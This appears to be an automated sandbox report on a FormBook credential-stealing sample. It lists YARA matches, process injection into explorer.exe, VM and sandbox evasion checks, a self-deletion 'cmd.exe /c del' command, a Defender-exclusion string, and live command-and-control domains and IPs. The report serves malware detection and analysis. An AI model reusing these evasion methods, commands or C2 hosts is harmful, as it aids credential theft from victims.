          Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ox87DNNM8d.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/3
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ox87DNNM8d.exe.log
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: ox87DNNM8d.exeVirustotal: Detection: 56%
          Source: ox87DNNM8d.exeMetadefender: Detection: 38%
          Source: ox87DNNM8d.exeReversingLabs: Detection: 65%
          Source: unknownProcess created: C:\Users\user\Desktop\ox87DNNM8d.exe 'C:\Users\user\Desktop\ox87DNNM8d.exe'
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeProcess created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: ox87DNNM8d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ox87DNNM8d.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.282590732.0000000000CC0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 1_2_00B5CFB8 push edx; ret 1_2_00B5CFF4
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 1_2_00B5C8C0 push eax; retf 1_2_00B5C861
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 1_2_00B5DBCA push eax; retf 1_2_00B5DB6B
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 1_2_00B5D21C push eax; retf 1_2_00B5D1BD
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 1_2_00B5D966 push edx; ret 1_2_00B5D9A2
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 1_2_00B5C65C push edx; ret 1_2_00B5C698
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 1_2_0642674D push es; ret 1_2_06426754
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 1_2_06426799 push es; ret 1_2_0642679C
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00401028 push ds; ret 3_2_0040102C
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_004171DE push 974CB969h; retf 3_2_004171E6
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_004172CC push edx; ret 3_2_004172D8
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00416BC9 push es; retf 3_2_00416BDC
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_004163B0 push ss; ret 3_2_004163C6
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00FBC8C0 push eax; retf 3_2_00FBC861
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00FBD966 push edx; ret 3_2_00FBD9A2
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00FBD21C push eax; retf 3_2_00FBD1BD
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00FBDBCA push eax; retf 3_2_00FBDB6B
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00FBC65C push edx; ret 3_2_00FBC698
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00FBCFB8 push edx; ret 3_2_00FBCFF4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_045ED0D1 push ecx; ret 8_2_045ED0E4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_001871DE push 974CB969h; retf 8_2_001871E6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_001872CC push edx; ret 8_2_001872D8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_001863B0 push ss; ret 8_2_001863C6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_00186BC9 push es; retf 8_2_00186BDC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0018CEA5 push eax; ret 8_2_0018CEF8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0018CEFB push eax; ret 8_2_0018CF62
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0018CEF2 push eax; ret 8_2_0018CEF8
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93204508639

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEC
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ox87DNNM8d.exe PID: 4368, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000001798E4 second address: 00000000001798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000000179B4E second address: 0000000000179B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ox87DNNM8d.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe TID: 5636 Thread sleep time: -101791s >= -30000s
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe TID: 5984 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2268 Thread sleep count: 34 > 30
          Source: C:\Windows\explorer.exe TID: 2268 Thread sleep time: -68000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 6548 Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread delayed: delay time: 101791
          Source: explorer.exe, 00000004.00000000.262437256.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.262437256.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.241045393.000000000374F000.00000004.00000001.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000002.501948287.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000000.241045393.000000000374F000.00000004.00000001.sdmp Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.237589481.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}##
          Source: explorer.exe, 00000004.00000002.508140093.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0040ACC0 LdrLoadDll, 3_2_0040ACC0
          Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04661074 mov eax, dword ptr fs:[00000030h] 8_2_04661074
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.secureproductsolutions.net
          Source: C:\Windows\explorer.exe Network Connect: 75.119.206.89 80
          Source: C:\Windows\explorer.exe Domain query: www.americacivics.com
          Source: C:\Windows\explorer.exe Domain query: www.vstarfireworks.com
          Source: C:\Windows\explorer.exe Network Connect: 43.249.29.43 80
          Source: C:\Windows\explorer.exe Network Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exe Domain query: www.dcsdeliveryaz.website
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Memory written: C:\Users\user\Desktop\ox87DNNM8d.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe
          Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'
          Source: explorer.exe, 00000004.00000000.250657770.0000000005EA0000.00000004.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.237331727.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Users\user\Desktop\ox87DNNM8d.exe VolumeInformation
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\ox87DNNM8d.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
